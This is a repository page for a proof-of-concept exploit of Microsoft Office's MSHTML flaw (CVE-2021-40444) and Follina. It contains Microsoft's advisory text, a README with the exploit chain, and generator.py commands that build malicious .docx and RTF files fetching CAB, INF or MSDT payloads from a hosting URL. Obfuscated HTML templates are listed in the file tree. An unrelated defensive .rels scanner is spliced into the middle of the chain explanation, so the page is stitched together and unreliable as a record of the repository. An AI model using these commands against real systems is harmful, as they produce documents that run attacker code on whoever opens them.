
CVE-2021-40444 PoC — Microsoft MSHTML Remote Code Execution Vulnerability

Associated Vulnerability
Title: Microsoft MSHTML Remote Code Execution Vulnerability (CVE-2021-40444)

Description:

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

Please see the **Mitigations** and **Workaround** sections for important information about steps you can take to protect your system from this vulnerability.

**UPDATE** September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.
Description
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.
Readme
# Exploiting Follina CVE and CVE-2021-40444 Vulnerabilities

## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Setup and Installation](#setup-and-installation)
4. [Usage](#usage)
5. [Detailed Explanation](#detailed-explanation)
6. [Commands](#commands)
7. [Disclaimer](#disclaimer)

## Introduction
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.

## Prerequisites
- Flare VM
- Python 3.x
- Microsoft Word
- Required Python packages (listed in `requirements.txt`)

## Setup and Installation
1. **Flare VM Setup:**
   - Ensure you have Flare VM installed. The credentials for the VM are:
     - Username: `lab`
     - Password: `password`
   
2. **Python and Virtual Environment:**
   ```bash
   git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444
   cd Follina-CVE-and-CVE-2021-40444\CVE-2021-40444
   ```
   - Make sure Python and pip are installed in the virtual machine.
   - Install the `virtualenv` package using the following command:
     ```bash
     pip install virtualenv
     ```
   - Create a virtual environment named `venv`:
     ```bash
     python -m virtualenv venv
     ```
   - Activate the virtual environment:
     ```bash
     venv\Scripts\activate.bat
     ```
   - Install the required packages:
     ```bash
     pip install -r requirements.txt
     ```

## Usage
1. **Generating the Exploit:**
   - Navigate to the project directory and run the following command to generate the exploit:
     ```bash
     python generator.py -u http://192.168.197.132 -P test\calc.dll --host
     ```
     Replace `192.168.197.132` with your IP address.

2. **Accessing the Generated Document:**
   - The generated `.docx` file will be located in the directory:
     ```
     C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
     ```

## Detailed Explanation
### Chain Exploitation
- The document (`.docx`) is opened.
- The document contains a relationship pointing to malicious HTML stored in `document.xml.rels`.
- The HTML link opens in IE preview.
- An `object` element points to a CAB file and an `iframe` points to an INF file; both references are embedded in JScript and prefixed with the ".cpl:" directive.
- The CAB file is opened, which saves the INF file into the `%TEMP%\Low` directory.
- The INF file is opened using the ".cpl:" directive, causing `rundll32` to side-load the INF file.
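The first link in that chain is a relationship entry in `document.xml.rels` whose target lives outside the package. The following check, an added defensive example and not code from this repository, walks the `.rels` parts of a `.docx` and reports external, non-hyperlink relationships whose target is a remote URL; the sample packages are constructed in memory, `example.invalid` is a placeholder host, and the relationship type URIs are the standard OOXML ones.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OOXML = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# A remote scheme here hands the target to MSHTML/IE rather than the package.
REMOTE_SCHEME = re.compile(r"^(https?|mhtml|file):", re.IGNORECASE)

def scan_docx_rels(docx_bytes):
    """Return (part, rel_id, rel_type, target) for every external, non-hyperlink
    relationship whose target is a remote URL; a clean Word file yields []."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(RELS_NS + "Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # relative in-package part such as styles.xml
                if rtype == "hyperlink":
                    continue  # clickable links are legitimately external
                target = rel.get("Target", "")
                if REMOTE_SCHEME.match(target):
                    findings.append((part, rel.get("Id"), rtype, target))
    return findings

def build_sample_docx(rels_xml):
    """Constructed minimal in-memory .docx with only the parts the scan reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

RELS_OPEN = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
BENIGN_RELS = (RELS_OPEN
    + '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>' % OOXML
    + '<Relationship Id="rId2" Type="%shyperlink" Target="https://example.invalid/"'
      ' TargetMode="External"/>' % OOXML
    + "</Relationships>")
# Same package plus an OLE object relationship to a remote HTML page (constructed).
SUSPICIOUS_RELS = BENIGN_RELS.replace("</Relationships>",
    '<Relationship Id="rId9" Type="%soleObject" Target="http://example.invalid/word.html"'
    ' TargetMode="External"/></Relationships>' % OOXML)
```

Running `scan_docx_rels` over a real document from the `out` directory is the same call with the file's bytes; an empty list means no remote relationship target was found.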

### Scripts Overview
#### `generator.py`
- Implements an exploit for CVE-2021-40444, allowing remote code execution via Microsoft Office.
- Contains various helper functions for patching CAB files, creating RAR files, generating payloads, and more.

#### `cab_parser.py`
- A tool for viewing CAB file headers.
- Defines classes and methods for handling and parsing CAB files.

### Section 2.0: Setup in Flare VM
- Install necessary tools and packages.
- Create and activate a virtual environment.
- Install Python packages from `requirements.txt`.

## Commands
- Generate the original exploit and test locally:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.dll --host
  ```
- Generate a CABless exploit leveraging MS-MSDT (Follina attack), in both DOCX and RTF documents:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
  ```
- Generate a CABless exploit (IE-only) with HTML smuggling and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
  ```
- Generate a CABless exploit with RAR and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
  ```

## Disclaimer
This project is for educational purposes only. Use it responsibly and do not exploit vulnerabilities on systems you do not have permission to test. Misuse of this information can lead to criminal charges.
File Snapshot

```
[4.0K] /data/pocs/84bef9e0bab6fc2334fd0fd75f713a8c8ba24580
├── [4.0K] CVE-2021-40444
│   ├── [4.0K] bin
│   │   ├── [619K] Rar.exe
│   │   ├── [485K] RarExt32.dll
│   │   └── [558K] RarExt.dll
│   ├── [6.8K] cab_parser.py
│   ├── [ 155] clean.bat
│   ├── [4.0K] data
│   │   └── [4.0K] word_dat
│   │       ├── [1.4K] [Content_Types].xml
│   │       ├── [4.0K] docProps
│   │       │   ├── [ 733] app.xml
│   │       │   └── [ 745] core.xml
│   │       ├── [4.0K] _rels
│   │       └── [4.0K] word
│   │           ├── [ 14K] document.xml
│   │           ├── [2.3K] fontTable.xml
│   │           ├── [4.0K] _rels
│   │           │   └── [1.2K] document.xml.rels
│   │           ├── [2.6K] settings.xml
│   │           ├── [ 32K] styles.xml
│   │           ├── [4.0K] theme
│   │           │   └── [6.9K] theme1.xml
│   │           └── [ 603] webSettings.xml
│   ├── [ 17K] generator.py
│   ├── [4.0K] out
│   │   ├── [ 12K] document.docx
│   │   └── [   0] hello.docx
│   ├── [4.0K] __pycache__
│   │   └── [ 16K] cab_parser.cpython-311.pyc
│   ├── [  25] requirements.txt
│   ├── [ 927] setup.inf
│   ├── [ 275] setup.rpt
│   ├── [4.0K] srv
│   │   ├── [   0] 21WBQ6UPOZT9.html
│   │   ├── [   0] DU92IN37GTLF.html
│   │   ├── [   0] DV0WJATZJEN0.html
│   │   ├── [ 11K] index.html
│   │   ├── [5.1K] J0803VTK5W9N.html
│   │   ├── [ 403] mswordcab.ddf
│   │   ├── [   0] QRN6Q3438F8Q.html
│   │   ├── [5.1K] R7GGVKCTDG7X.html
│   │   └── [   0] WR0KINF7X8YR.html
│   ├── [4.0K] template
│   │   ├── [5.1K] cabless-msdt-sample2.html
│   │   ├── [5.1K] cabless-rar-sample1.html
│   │   ├── [6.2K] cabless-smuggling-sample1.html
│   │   ├── [4.5K] cab-orig-debobfuscated1.html
│   │   ├── [5.9K] cab-orig-debobfuscated2.html
│   │   ├── [5.3K] cab-orig-j00sean.html
│   │   ├── [6.2K] cab-orig-obfuscated.html
│   │   ├── [4.9K] cab-uri-debobfuscated1.html
│   │   ├── [6.5K] cab-uri-debobfuscated2.html
│   │   ├── [6.3K] cab-uri-obfuscated.html
│   │   ├── [5.4K] cab-uri-sample1.html
│   │   ├── [6.2K] cab-uri-test-obfuscated.html
│   │   └── [ 11K] index.html
│   ├── [4.0K] test
│   │   ├── [ 81K] calc.dll
│   │   ├── [ 200] calc.hta
│   │   ├── [ 101] calc.js
│   │   ├── [  24] calc.ps1
│   │   ├── [ 143] calc.vbs
│   │   ├── [ 112] job-jscript.wsf
│   │   └── [ 112] job-vbs.wsf
│   └── [4.0K] util
│       └── [1.6K] server.py
├── [1.0K] LICENSE
└── [3.8K] README.md

15 directories, 54 files
```